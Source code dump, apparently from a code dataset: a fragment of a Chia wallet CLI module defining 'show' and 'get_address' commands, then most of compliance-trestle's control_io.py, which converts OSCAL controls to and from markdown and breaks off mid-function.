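#   chia wallet send -f 3801532865 -i 1 -a 0.1 -m 0 -t txch1q2k3...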
@wallet_cmd.command("show", short_help="Show wallet information")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
def show_cmd(wallet_rpc_port: int, fingerprint: int) -> None:
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, {}, print_balances))
@wallet_cmd.command("get_address", short_help="Get a wallet receive address")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
def get_address_cmd(wallet_rpc_port: int, id, fingerprint: int) -> None:
extra_params = {"id": id}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, get_address))
| 44.662461 | 119 | 0.651575 |
4a1f63b43ea4ad051fa4826b728ab8c6817145b1 | 53,713 | py | Python | trestle/core/control_io.py | jayhawk87/compliance-trestle | d0262826f30e0c7f89f8a3551b93142669fa2c66 | ["Apache-2.0"] | null | null | null | trestle/core/control_io.py | jayhawk87/compliance-trestle | d0262826f30e0c7f89f8a3551b93142669fa2c66 | ["Apache-2.0"] | null | null | null | trestle/core/control_io.py | jayhawk87/compliance-trestle | d0262826f30e0c7f89f8a3551b93142669fa2c66 | ["Apache-2.0"] | null | null | null |
# Copyright (c) 2021 IBM Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handle direct i/o reading and writing controls as markdown."""
import copy
import logging
import pathlib
import re
import string
from datetime import datetime
from typing import Any, Dict, List, Optional, Tuple, Union
import frontmatter
import trestle.oscal.catalog as cat
import trestle.oscal.ssp as ossp
from trestle.core import const
from trestle.core import generators as gens
from trestle.core.err import TrestleError
from trestle.core.markdown.markdown_api import MarkdownAPI
from trestle.core.markdown.markdown_processor import MarkdownNode
from trestle.core.markdown.md_writer import MDWriter
from trestle.core.utils import as_list, none_if_empty, spaces_and_caps_to_snake
from trestle.oscal import common
from trestle.oscal import profile as prof
logger = logging.getLogger(__name__)
class ControlIOWriter():
"""Class to write controls as markdown."""
def __init__(self):
"""Initialize the class."""
self._md_file: Optional[MDWriter] = None
@staticmethod
def _wrap_label(label: str):
l_side = '\['
r_side = '\]'
wrapped = '' if label == '' else f'{l_side}{label}{r_side}'
return wrapped
@staticmethod
def _get_label(part: common.Part) -> str:
"""Get the label from the props of a part."""
if part.props is not None:
for prop in part.props:
if prop.name == 'label':
return prop.value.strip()
return ''
def _get_part(self, part: common.Part, item_type: str, skip_id: Optional[str]) -> List[Union[str, List[str]]]:
"""
Find parts with the specified item type, within the given part.
For a part in a control find the parts in it that match the item_type
Return list of string formatted labels and associated descriptive prose
"""
items = []
if part.name in ['statement', item_type]:
# the options here are to force the label to be the part.id or the part.label
# the label may be of the form (a) while the part.id is ac-1_smt.a.1.a
# here we choose the latter and extract the final element
label = part.id.split('.')[-1]
wrapped_label = self._wrap_label(label)
pad = '' if wrapped_label == '' or not part.prose else ' '
prose = '' if part.prose is None else part.prose
# top level prose has already been written out, if present
# use presence of . in id to tell if this is top level prose
if part.id != skip_id:
items.append(f'{wrapped_label}{pad}{prose}')
if part.parts:
sub_list = []
for prt in part.parts:
sub_list.extend(self._get_part(prt, item_type, skip_id))
sub_list.append('')
items.append(sub_list)
return items
def _add_part_and_its_items(self, control: cat.Control, name: str, item_type: str) -> None:
"""For a given control add its one statement and its items to the md file after replacing params."""
items = []
if control.parts:
for part in control.parts:
if part.name == name:
# If the part has prose write it as a raw line and not list element
skip_id = part.id
if part.prose:
# need to avoid split lines in statement items
self._md_file.new_line(part.prose.replace('\n', ' '))
items.append(self._get_part(part, item_type, skip_id))
# unwrap the list if it is many levels deep
while not isinstance(items, str) and len(items) == 1:
items = items[0]
self._md_file.new_paragraph()
self._md_file.new_list(items)
def _add_yaml_header(self, yaml_header: Optional[Dict]) -> None:
if yaml_header:
self._md_file.add_yaml_header(yaml_header)
@staticmethod
def _gap_join(a_str: str, b_str: str) -> str:
a_clean = a_str.strip()
b_clean = b_str.strip()
if not b_clean:
return a_clean
gap = '\n' if a_clean else ''
return a_clean + gap + b_clean
def _add_control_statement(self, control: cat.Control, group_title: str) -> None:
"""Add the control statement and items to the md file."""
self._md_file.new_paragraph()
title = f'{control.id} - \[{group_title}\] {control.title}'
self._md_file.new_header(level=1, title=title)
self._md_file.new_header(level=2, title='Control Statement')
self._md_file.set_indent_level(-1)
self._add_part_and_its_items(control, 'statement', 'item')
self._md_file.set_indent_level(-1)
def _add_control_statement_ssp(self, control: cat.Control) -> None:
"""Add the control statement and items to the markdown SSP."""
self._md_file.new_paragraph()
label = self._get_label(control) if self._get_label(control) != '' else control.id.upper()
title = f'{label} - {control.title}'
self._md_file.new_header(level=1, title=title)
self._md_file.new_header(level=2, title='Control Statement')
self._md_file.set_indent_level(-1)
self._add_part_and_its_items(control, 'statement', 'item')
self._md_file.set_indent_level(-1)
def _add_control_objective(self, control: cat.Control) -> None:
if control.parts:
for part in control.parts:
if part.name == 'objective':
self._md_file.new_paragraph()
self._md_file.new_header(level=2, title='Control Objective')
self._md_file.set_indent_level(-1)
self._add_part_and_its_items(control, 'objective', 'objective')
self._md_file.set_indent_level(-1)
return
@staticmethod
def _get_control_section_part(part: common.Part, section: str) -> str:
"""Get the prose for a named section in the control."""
prose = ''
if part.name == section and part.prose is not None:
prose = ControlIOWriter._gap_join(prose, part.prose)
if part.parts:
for sub_part in part.parts:
prose = ControlIOWriter._gap_join(prose, ControlIOWriter._get_control_section_part(sub_part, section))
return prose
@staticmethod
def _get_control_section(control: cat.Control, section: str) -> str:
prose = ''
if control.parts:
for part in control.parts:
prose = ControlIOWriter._gap_join(prose, ControlIOWriter._get_control_section_part(part, section))
return prose
@staticmethod
def _find_section_info(part: common.Part, section_list: List[str]):
"""Find section not in list."""
if part.prose and part.name not in section_list:
return part.id, part.name
if part.parts:
for part in part.parts:
id_, name = ControlIOWriter._find_section_info(part, section_list)
if id_:
return id_, name
return '', ''
@staticmethod
def _find_section(control: cat.Control, section_list: List[str]) -> Tuple[str, str]:
"""Find next section not in list."""
if control.parts:
for part in control.parts:
id_, name = ControlIOWriter._find_section_info(part, section_list)
if id_:
return id_, name
return '', ''
@staticmethod
def _get_section(control: cat.Control, section_list: List[str]) -> Tuple[str, str, str]:
"""Get sections that are not in the list."""
id_, name = ControlIOWriter._find_section(control, section_list)
if id_:
return id_, name, ControlIOWriter._get_control_section(control, name)
return '', '', ''
def _add_sections(self, control: cat.Control) -> None:
"""Add the extra control sections after the main ones."""
skip_section_list = ['statement', 'item', 'objective']
while True:
name, id_, prose = self._get_section(control, skip_section_list)
if not name:
return
if prose:
skip_section_list.append(id_)
if self._sections and id_ in self._sections:
id_ = self._sections[id_]
self._md_file.new_header(level=2, title=f'Control {id_}')
self._md_file.new_line(prose)
self._md_file.new_paragraph()
def _insert_existing_text(self, part_label: str, existing_text: Dict[str, List[str]]) -> None:
"""Insert text captured in the previous markdown and reinsert to avoid overwrite."""
if part_label in existing_text:
self._md_file.new_paragraph()
for line in existing_text[part_label]:
self._md_file.new_line(line)
def _add_response(self, control: cat.Control, comp_dict: Dict[str, Dict[str, List[str]]]) -> None:
"""Add the response request text for all parts to the markdown along with the header."""
self._md_file.new_hr()
self._md_file.new_paragraph()
self._md_file.new_header(level=2, title=f'{const.SSP_MD_IMPLEMENTATION_QUESTION}')
# if the control has no parts written out then enter implementation in the top level entry
# but if it does have parts written out, leave top level blank and provide details in the parts
# Note that parts corresponding to sections don't get written out here so a check is needed
# If we have responses per component then enter them in separate ### sections
did_write_part = False
if control.parts:
for part in control.parts:
if part.parts:
if part.name == 'statement':
for prt in part.parts:
if prt.name != 'item':
continue
if not did_write_part:
self._md_file.new_line(const.SSP_MD_LEAVE_BLANK_TEXT)
# insert extra line to make mdformat happy
self._md_file._add_line_raw('')
self._md_file.new_hr()
part_label = self._get_label(prt)
# if no label guess the label from the sub-part id
if not part_label:
part_label = prt.id.split('.')[-1]
self._md_file.new_header(level=2, title=f'Implementation {part_label}')
added_content = False
for comp_name, prose_dict in comp_dict.items():
if part_label in prose_dict:
if comp_name != const.SSP_MAIN_COMP_NAME:
self._md_file.new_header(level=3, title=comp_name)
self._insert_existing_text(part_label, prose_dict)
added_content = True
self._md_file.new_paragraph()
if not added_content:
self._md_file.new_line(f'{const.SSP_ADD_IMPLEMENTATION_FOR_ITEM_TEXT} {prt.id}')
did_write_part = True
# if we loaded nothing for this control yet then it must need a fresh prompt for the control statement
if not comp_dict and not did_write_part:
self._md_file.new_line(f'{const.SSP_ADD_IMPLEMENTATION_FOR_CONTROL_TEXT} {control.id}')
part_label = 'Statement'
for comp_name, prose_dict in comp_dict.items():
if part_label in prose_dict:
if comp_name != const.SSP_MAIN_COMP_NAME:
self._md_file.new_header(level=3, title=comp_name)
self._insert_existing_text(part_label, prose_dict)
self._md_file.new_hr()
@staticmethod
def _get_adds(control_id: str, profile: prof.Profile) -> List[Tuple[str, str]]:
adds = []
if profile and profile.modify and profile.modify.alters:
for alter in profile.modify.alters:
if alter.control_id == control_id and alter.adds:
for add in alter.adds:
if add.parts:
for part in add.parts:
if part.prose:
adds.append((part.name, part.prose))
return adds
def _add_additional_content(self, control: cat.Control, profile: prof.Profile) -> None:
adds = ControlIOWriter._get_adds(control.id, profile)
has_content = len(adds) > 0
self._md_file.new_header(level=1, title='Editable Content')
self._md_file.new_line('<!-- Make additions and edits below -->')
self._md_file.new_line(
'<!-- The above represents the contents of the control as received by the profile, prior to additions. -->' # noqa E501
)
self._md_file.new_line(
'<!-- If the profile makes additions to the control, they will appear below. -->' # noqa E501
)
self._md_file.new_line(
'<!-- The above may not be edited but you may edit the content below, and/or introduce new additions to be made by the profile. -->' # noqa E501
)
self._md_file.new_line(
'<!-- The content here will then replace what is in the profile for this control, after running profile-assemble. -->' # noqa E501
)
if has_content:
self._md_file.new_line(
'<!-- The added parts in the profile for this control are below. You may edit them and/or add new ones. -->' # noqa E501
)
else:
self._md_file.new_line(
'<!-- The current profile has no added parts for this control, but you may add new ones here. -->'
)
self._md_file.new_line('<!-- Each addition must have a heading of the form ## Control my_addition_name -->')
self._md_file.new_line(
'<!-- See https://ibm.github.io/compliance-trestle/tutorials/ssp_profile_catalog_authoring/ssp_profile_catalog_authoring for guidance. -->' # noqa E501
)
# next is to make mdformat happy
self._md_file._add_line_raw('')
for add in adds:
name, prose = add
self._md_file.new_header(level=2, title=f'Control {name}')
self._md_file.new_paraline(prose)
@staticmethod
def get_part_prose(control: cat.Control, part_name: str) -> str:
"""Get the prose for a named part."""
prose = ''
if control.parts:
for part in control.parts:
prose += ControlIOWriter._get_control_section_part(part, part_name)
return prose.strip()
@staticmethod
def merge_dicts_deep(dest: Dict[Any, Any], src: Dict[Any, Any], preserve_dest_values: bool) -> None:
"""
Merge dict src into dest.
New items are always added from src to dest.
Items present in both will not override dest if preserve_dest_values is True.
"""
for key in src.keys():
if key in dest:
# if they are both dicts, recurse
if isinstance(dest[key], dict) and isinstance(src[key], dict):
ControlIOWriter.merge_dicts_deep(dest[key], src[key], preserve_dest_values)
# otherwise override dest if needed
elif not preserve_dest_values:
dest[key] = src[key]
else:
# if the item was not already in dest, add it from src
dest[key] = src[key]
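    # Minimal behavioral sketch of merge_dicts_deep (illustrative values, not from the
    # original source):
    #   dest = {'a': 1, 'b': {'c': 2}}
    #   src = {'a': 9, 'b': {'d': 3}}
    #   ControlIOWriter.merge_dicts_deep(dest, src, preserve_dest_values=True)
    #   # dest is now {'a': 1, 'b': {'c': 2, 'd': 3}}: existing values kept, new keys added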
def write_control(
self,
dest_path: pathlib.Path,
control: cat.Control,
group_title: str,
yaml_header: Optional[Dict],
sections: Optional[Dict[str, str]],
additional_content: bool,
prompt_responses: bool,
profile: Optional[prof.Profile],
preserve_header_values: bool,
) -> None:
"""
Write out the control in markdown format into the specified directory.
Args:
dest_path: Path to the directory where the control will be written
control: The control to write as markdown
group_title: Title of the group containing the control
yaml_header: Optional dict to be written as markdown yaml header
sections: Optional string lookup dict mapping section abbrev. to pretty version for display
additional_content: Should the additional content be printed corresponding to profile adds
prompt_responses: Should the markdown include prompts for implementation detail responses
profile: Profile containing the adds making up additional content
preserve_header_values: Retain existing values in markdown header content but add new content
Returns:
None
Notes:
The filename is constructed from the control's id, so only the markdown directory is required.
If a yaml header is present in the file, new values in provided header replace those in the markdown header.
But if preserve_header_values then don't change any existing values, but allow addition of new content.
The above only applies to generic header content and not sections of type x-trestle-
"""
control_file = dest_path / (control.id + '.md')
existing_text, header = ControlIOReader.read_all_implementation_prose_and_header(control_file)
self._md_file = MDWriter(control_file)
self._sections = sections
merged_header = copy.deepcopy(header)
if yaml_header:
ControlIOWriter.merge_dicts_deep(merged_header, yaml_header, preserve_header_values)
self._add_yaml_header(merged_header)
self._add_control_statement(control, group_title)
self._add_control_objective(control)
self._add_sections(control)
if prompt_responses:
self._add_response(control, existing_text)
if additional_content:
self._add_additional_content(control, profile)
self._md_file.write_out()
def get_control_statement(self, control: cat.Control) -> List[str]:
"""Get back the formatted control from a catalog."""
self._md_file = MDWriter(None)
self._add_control_statement_ssp(control)
return self._md_file.get_lines()
def get_params(self, control: cat.Control) -> List[str]:
"""Get parameters for control."""
reader = ControlIOReader()
param_dict = reader.get_control_param_dict(control, False)
if param_dict:
self._md_file = MDWriter(None)
self._md_file.new_paragraph()
self._md_file.set_indent_level(-1)
self._md_file.new_table([[key, param_dict[key]] for key in param_dict.keys()], ['Parameter ID', 'Value'])
self._md_file.set_indent_level(-1)
return self._md_file.get_lines()
return []
class ControlIOReader():
"""Class to read controls from markdown."""
@staticmethod
def _strip_to_make_ncname(label: str) -> str:
"""Strip chars to conform with NCNAME regex."""
orig_label = label
# make sure first char is allowed
while label and label[0] not in const.NCNAME_UTF8_FIRST_CHAR_OPTIONS:
label = label[1:]
new_label = label[:1]
# now check remaining chars
if len(label) > 1:
for ii in range(1, len(label)):
if label[ii] in const.NCNAME_UTF8_OTHER_CHAR_OPTIONS:
new_label += label[ii]
# do final check to confirm it is NCNAME
match = re.search(const.NCNAME_REGEX, new_label)
if not match:
raise TrestleError(f'Unable to convert label {orig_label} to NCNAME format.')
return new_label
@staticmethod
def param_values_as_string(set_param: prof.SetParameter) -> str:
"""Convert param values to single string."""
return 'None' if not set_param.values else ', '.join(v.__root__ for v in set_param.values)
@staticmethod
def _load_control_lines_and_header(control_file: pathlib.Path) -> Tuple[List[str], Dict[str, Any]]:
lines: List[str] = []
try:
content = control_file.open('r', encoding=const.FILE_ENCODING).read()
except UnicodeDecodeError as e:
logger.error('utf-8 decoding failed.')
logger.error(f'See: {const.WEBSITE_ROOT}/errors/#utf-8-encoding-only')
logger.debug(f'Underlying exception {e}')
raise TrestleError('Unable to load file due to utf-8 encoding issues.')
try:
fm = frontmatter.loads(content)
except Exception as e:
logger.error(f'Error parsing yaml header from file {control_file}')
logger.error('This is most likely due to an incorrect yaml structure.')
logger.debug(f'Underlying error: {str(e)}')
raise TrestleError(f'Failure parsing yaml header on file {control_file}')
raw_lines = fm.content.split('\n')
header = fm.metadata
# Any fully blank lines will be retained but as empty strings
lines = [line.strip('\r\n').rstrip() for line in raw_lines]
clean_lines = []
# need to keep indentation and empty lines
for line in lines:
if line.startswith('<!--') or line.startswith('__________________'):
continue
clean_lines.append(line)
return clean_lines, header
@staticmethod
def _read_id_group_id_title(line: str) -> Tuple[int, str, str]:
"""Process the line and find the control id, group id and control title."""
if line.count('-') < 2:
raise TrestleError(f'Markdown control title format error: {line}')
control_id = line.split()[1]
first_dash = line.find('-')
title_line = line[first_dash + 1:]
group_start = title_line.find('\[')
group_end = title_line.find('\]')
if group_start < 0 or group_end < 0 or group_start > group_end:
raise TrestleError(f'unable to read group and title for control {control_id}')
group_id = title_line[group_start + 2:group_end].strip()
control_title = title_line[group_end + 2:].strip()
return control_id, group_id, control_title
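    # Example of the header line this parser expects, as written by ControlIOWriter
    # (control id, group and title values are illustrative):
    #   '# ac-1 - \[Access Control\] Policy and Procedures'
    # which yields ('ac-1', 'Access Control', 'Policy and Procedures').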
@staticmethod
def _indent(line: str) -> int:
"""Measure indent of non-empty line."""
if not line:
raise TrestleError('Empty line queried for indent.')
if line[0] not in [' ', '-']:
return -1
for ii in range(len(line)):
if line[ii] == '-':
return ii
# if line is indented it must start with -
if line[ii] != ' ':
break
raise TrestleError(f'List elements must start with -: {line}')
@staticmethod
def _get_next_line(ii: int, lines: List[str]) -> Tuple[int, str]:
while ii < len(lines):
line = lines[ii]
if line:
return ii, line
ii += 1
return -1, ''
@staticmethod
def _get_next_indent(ii: int, lines: List[str]) -> Tuple[int, int, str]:
"""Seek to next content line. ii remains at line read."""
while 0 <= ii < len(lines):
line = lines[ii]
if line:
if line[0] == '#':
return ii, -1, line
indent = ControlIOReader._indent(line)
if indent >= 0:
# extract text after -
start = indent + 1
while start < len(line) and line[start] != ' ':
start += 1
if start >= len(line):
raise TrestleError(f'Invalid line {line}')
return ii, indent, line[start:]
return ii, indent, line
ii += 1
return ii, -1, ''
@staticmethod
def _read_part_id_prose(line: str) -> Tuple[str, str]:
"""Extract the part id letter or number and prose from line."""
start = line.find('\\[')
end = line.find('\\]')
prose = line.strip() if start < 0 else line[end + 2:].strip()
id_ = '' if start < 0 or end < 0 else line[start + 2:end]
return id_, prose
@staticmethod
def _bump_label(label: str) -> str:
"""
Find next label given a string of 1 or more pure letters or digits.
The input must be either a string of digits or a string of ascii letters - or empty string.
"""
if not label:
return 'a'
if label[0] in string.digits:
return str(int(label) + 1)
if len(label) == 1 and label[0].lower() < 'z':
return chr(ord(label[0]) + 1)
# if this happens to be a string of letters, force it lowercase and bump
label = label.lower()
factor = 1
value = 0
# delta is needed because a counts as 0 when first value on right, but 1 for all others
delta = 0
for letter in label[::-1]:
value += (ord(letter) - ord('a') + delta) * factor
factor *= 26
delta = 1
value += 1
new_label = ''
delta = 0
while value > 0:
new_label += chr(ord('a') + value % 26 - delta)
value = value // 26
delta = 1
return new_label[::-1]
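    # Behavioral sketch (illustrative): _bump_label('') -> 'a', _bump_label('b') -> 'c',
    # _bump_label('z') -> 'aa', _bump_label('9') -> '10'.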
@staticmethod
def _create_next_label(prev_label: str, indent: int) -> str:
"""
Create new label at indent level based on previous label if available.
If previous label is available, make this the next one in the sequence.
Otherwise start with a or 1 on alternate levels of indentation.
If alphabetic label reaches z, next one is aa.
Numeric ranges from 1 to 9, then 10 etc.
"""
if not prev_label:
# assume indent goes in steps of 2
return ['a', '1'][(indent // 2) % 2]
label_prefix = ''
label_suffix = prev_label
is_char = prev_label[-1] in string.ascii_letters
# if it isn't ending in letter or digit just append 'a' to end
if not is_char and prev_label[-1] not in string.digits:
return prev_label + 'a'
# break in middle of string if mixed types
if len(prev_label) > 1:
ii = len(prev_label) - 1
while ii >= 0:
if prev_label[ii] not in string.ascii_letters + string.digits:
break
if (prev_label[ii] in string.ascii_letters) != is_char:
break
ii -= 1
if ii >= 0:
label_prefix = prev_label[:(ii + 1)]
label_suffix = prev_label[(ii + 1):]
return label_prefix + ControlIOReader._bump_label(label_suffix)
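    # Behavioral sketch (illustrative): _create_next_label('', 0) -> 'a',
    # _create_next_label('', 2) -> '1', _create_next_label('a', 0) -> 'b',
    # _create_next_label('1.c', 2) -> '1.d'.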
@staticmethod
def _read_parts(indent: int, ii: int, lines: List[str], parent_id: str,
parts: List[common.Part]) -> Tuple[int, List[common.Part]]:
"""If indentation level goes up or down, create new list or close current one."""
while True:
ii, new_indent, line = ControlIOReader._get_next_indent(ii, lines)
if new_indent < 0:
# we are done reading control statement
return ii, parts
if new_indent == indent:
# create new item part and add to current list of parts
id_text, prose = ControlIOReader._read_part_id_prose(line)
# id_text is the part id and needs to be as a label property value
# if none is there then create one from previous part, or use default
if not id_text:
prev_label = ControlIOWriter._get_label(parts[-1]) if parts else ''
id_text = ControlIOReader._create_next_label(prev_label, indent)
id_ = ControlIOReader._strip_to_make_ncname(parent_id + '.' + id_text)
name = 'objective' if id_.find('_obj') > 0 else 'item'
prop = common.Property(name='label', value=id_text)
part = common.Part(name=name, id=id_, prose=prose, props=[prop])
parts.append(part)
ii += 1
elif new_indent > indent:
# add new list of parts to last part and continue
if len(parts) == 0:
raise TrestleError(f'Improper indentation structure: {line}')
ii, new_parts = ControlIOReader._read_parts(new_indent, ii, lines, parts[-1].id, [])
if new_parts:
parts[-1].parts = new_parts
else:
# return list of sub-parts
return ii, parts
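    # Illustrative shape of the markdown list consumed here (labels and prose are
    # hypothetical; parent_id 'ac-1_smt' is just an example):
    #   - \[a\] First item prose
    #     - \[1\] Nested sub-item prose
    #   - \[b\] Second item prose
    # producing parts with ids ac-1_smt.a, ac-1_smt.a.1 and ac-1_smt.b.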
@staticmethod
def _read_control_statement(ii: int, lines: List[str], control_id: str) -> Tuple[int, common.Part]:
"""Search for the Control statement and read until next ## Control."""
while 0 <= ii < len(lines) and not lines[ii].startswith('## Control '):
ii += 1
if ii >= len(lines):
raise TrestleError(f'Control statement not found for control {control_id}')
ii += 1
ii, line = ControlIOReader._get_next_line(ii, lines)
if ii < 0:
# This means no statement and control withdrawn (this happens in NIST catalog)
return ii, None
if line and line[0] == ' ' and line.lstrip()[0] != '-':
# prose that appears indented but has no - : treat it as the normal statement prose
line = line.lstrip()
indent = -1
ii += 1
else:
ii, indent, line = ControlIOReader._get_next_indent(ii, lines)
statement_part = common.Part(name='statement', id=f'{control_id}_smt')
# first line is either statement prose or start of statement parts
if indent < 0:
statement_part.prose = line
ii += 1
# we have absorbed possible statement prose.
# now just read parts recursively
# if there was no statement prose, this will re-read the line just read
# as the start of the statement's parts
ii, parts = ControlIOReader._read_parts(0, ii, lines, statement_part.id, [])
statement_part.parts = parts if parts else None
return ii, statement_part
@staticmethod
def _read_control_objective(ii: int, lines: List[str], control_id: str) -> Tuple[int, Optional[common.Part]]:
ii_orig = ii
while 0 <= ii < len(lines) and not lines[ii].startswith('## Control Objective'):
ii += 1
if ii >= len(lines):
return ii_orig, None
ii += 1
ii, line = ControlIOReader._get_next_line(ii, lines)
if ii < 0:
raise TrestleError(f'Unable to parse objective from control markdown {control_id}')
if line and line[0] == ' ' and line.lstrip()[0] != '-':
# prose that appears indented but has no - : treat it as the normal objective prose
line = line.lstrip()
indent = -1
ii += 1
else:
ii, indent, line = ControlIOReader._get_next_indent(ii, lines)
objective_part = common.Part(name='objective', id=f'{control_id}_obj')
# first line is either objective prose or start of objective parts
if indent < 0:
objective_part.prose = line
ii += 1
# we have absorbed possible objective prose.
# now just read parts recursively
# if there was no objective prose, this will re-read the line just read
# as the start of the objective's parts
ii, parts = ControlIOReader._read_parts(0, ii, lines, objective_part.id, [])
objective_part.parts = parts if parts else None
return ii, objective_part
@staticmethod
def _read_sections(ii: int, lines: List[str], control_id: str,
control_parts: List[common.Part]) -> Tuple[int, List[common.Part]]:
"""Read all sections following the section separated by ## Control."""
new_parts = []
prefix = '## Control '
while 0 <= ii < len(lines):
line = lines[ii]
if line.startswith('## What is the solution') or line.startswith('# Editable Content'):
ii += 1
continue
if not line:
ii += 1
continue
if line and not line.startswith(prefix):
# the control has no sections to read, so exit the loop
break
label = line[len(prefix):].lstrip()
prose = ''
ii += 1
while 0 <= ii < len(lines) and not lines[ii].startswith(prefix) and not lines[ii].startswith(
'# Editable Content'):
prose = '\n'.join([prose, lines[ii]])
ii += 1
if prose:
id_ = ControlIOReader._strip_to_make_ncname(control_id + '_smt.' + label)
label = ControlIOReader._strip_to_make_ncname(label)
new_parts.append(common.Part(id=id_, name=label, prose=prose.strip('\n')))
if new_parts:
if control_parts:
control_parts.extend(new_parts)
else:
control_parts = new_parts
if not control_parts:
control_parts = None
return ii, control_parts
@staticmethod
def _clean_prose(prose: List[str]) -> List[str]:
# remove empty and horizontal rule lines at start and end of list of prose lines
forward_index = 0
for line in prose:
if line.strip() and not line.startswith('____'):
break
forward_index += 1
new_prose = prose[forward_index:]
reverse_index = 0
for line in reversed(new_prose):
if line.strip() and not line.startswith('____'):
break
reverse_index += 1
clean_prose = new_prose[:len(new_prose) - reverse_index]
clean_prose = clean_prose if clean_prose else ['']
# if there is no useful prose this will return [''] and allow generation of a statement with empty prose
return clean_prose
@staticmethod
def _simplify_name(name: str) -> str:
name = name.lower().strip()
return re.sub(' +', ' ', name)
@staticmethod
def _comp_name_in_dict(comp_name: str, comp_dict: Dict[str, List[Dict[str, str]]]) -> str:
"""If the name is already in the dict in a similar form, stick to that form."""
simple_name = ControlIOReader._simplify_name(comp_name)
for name in comp_dict.keys():
if simple_name == ControlIOReader._simplify_name(name):
return name
return comp_name
@staticmethod
def _add_node_to_dict(
comp_name: str,
label: str,
comp_dict: Dict[str, Dict[str, List[str]]],
node: MarkdownNode,
control_id: str,
comp_list: List[str]
) -> None:
prose = ControlIOReader._clean_prose(node.content.text)
if node.key.startswith('### '):
if len(node.key.split()) <= 1:
raise TrestleError(f'Line in control {control_id} markdown starts with ### but has no component name.')
comp_name = node.key.split(' ', 1)[1].strip()
simp_comp_name = ControlIOReader._simplify_name(comp_name)
if simp_comp_name == ControlIOReader._simplify_name(const.SSP_MAIN_COMP_NAME):
raise TrestleError(
f'Response in control {control_id} has {const.SSP_MAIN_COMP_NAME} as a component heading. '
'Instead, place all response prose for the default component at the top of th section, '
'with no ### component specified. It will be entered as prose for the default system component.'
)
if simp_comp_name in comp_list:
raise TrestleError(
f'Control {control_id} has a section with two ### component headings for {comp_name}. '
'Please combine the sections so there is only one heading for each component in a statement.'
)
comp_list.append(simp_comp_name)
comp_name = ControlIOReader._comp_name_in_dict(comp_name, comp_dict)
if comp_name in comp_dict:
if label in comp_dict[comp_name]:
comp_dict[comp_name][label].extend(prose)
else:
comp_dict[comp_name][label] = prose
else:
comp_dict[comp_name] = {label: prose}
for subnode in node.subnodes:
ControlIOReader._add_node_to_dict(comp_name, label, comp_dict, subnode, control_id, comp_list)
@staticmethod
def read_all_implementation_prose_and_header(
control_file: pathlib.Path
) -> Tuple[Dict[str, Dict[str, List[str]]], Dict[str, List[str]]]:
"""
Find all labels and associated prose in this control.
Args:
control_file: path to the control markdown file
Returns:
Dictionary by comp_name of Dictionaries of part labels and corresponding prose read from the markdown file.
Also returns the yaml header as dict in second part of tuple.
This does not generate components - it only tracks component names and associated responses.
"""
comp_dict = {}
yaml_header = {}
# this level only adds for top level component but add_node_to_dict can add for other components
comp_name = const.SSP_MAIN_COMP_NAME
control_id = control_file.stem
try:
if not control_file.exists():
return comp_dict, yaml_header
md_api = MarkdownAPI()
yaml_header, control = md_api.processor.process_markdown(control_file)
imp_string = 'Implementation'
headers = control.get_all_headers_for_key(imp_string, False)
header_list = list(headers)
if not header_list:
# if statement has no parts there is only one response for entire control
headers = control.get_all_headers_for_key(const.SSP_MD_IMPLEMENTATION_QUESTION, False)
# should be only one header, so warn if others found
n_headers = 0
for header in headers:
node = control.get_node_for_key(header)
ControlIOReader._add_node_to_dict(comp_name, 'Statement', comp_dict, node, control_id, [])
n_headers += 1
if n_headers > 1:
logger.warning(
f'Control {control_id} has single statement with extra response #{n_headers}'
' when it should only have one.'
)
else:
for header in header_list:
tokens = header.split(' ', 2)
if tokens[0] == '##' and tokens[1] == imp_string:
label = tokens[2].strip()
node = control.get_node_for_key(header)
ControlIOReader._add_node_to_dict(comp_name, label, comp_dict, node, control_id, [])
except TrestleError as e:
logger.error(f'Error occurred reading {control_file}')
raise e
return comp_dict, yaml_header
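    # Sketch of the returned structure (component and label names are hypothetical):
    #   comp_dict = {const.SSP_MAIN_COMP_NAME: {'a': ['response prose for part a'],
    #                                           'Statement': ['top-level response']}}
    #   yaml_header = {...}  # the markdown file's yaml front matter, verbatim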
@staticmethod
def _insert_header_content(imp_req: ossp.ImplementedRequirement, header: Dict[str, Any], control_id: str) -> None:
"""Insert yaml header content into the imp_req and its by_comps."""
dict_ = header.get(const.SSP_FEDRAMP_TAG, {})
# if an attribute is in the dict but it is None, need to make sure we get empty list anyway
control_orig = as_list(dict_.get(const.CONTROL_ORIGINATION, []))
imp_status = as_list(dict_.get(const.IMPLEMENTATION_STATUS, []))
roles = as_list(dict_.get(const.RESPONSIBLE_ROLES, []))
props = []
responsible_roles = []
for co in control_orig:
if isinstance(co, str):
props.append(common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.CONTROL_ORIGINATION, value=co))
elif isinstance(co, dict):
if const.INHERITED in co:
uuid = co[const.INHERITED]
props.append(common.Property(name=const.LEV_AUTH_UUID, value=uuid))
props.append(
common.Property(
ns=const.NAMESPACE_FEDRAMP, name=const.CONTROL_ORIGINATION, value=const.INHERITED
)
)
else:
raise TrestleError(f'The yaml header for control {control_id} has unexpected content: {co}')
else:
raise TrestleError(f'The yaml header for control {control_id} has unexpected content: {co}')
for status in imp_status:
if isinstance(status, str):
props.append(
common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.IMPLEMENTATION_STATUS, value=status)
)
elif isinstance(status, dict):
if const.PLANNED in status:
if const.COMPLETION_DATE not in status:
raise TrestleError(
f'Planned status in the control {control_id} yaml header must '
f'specify completion date: {status}'
)
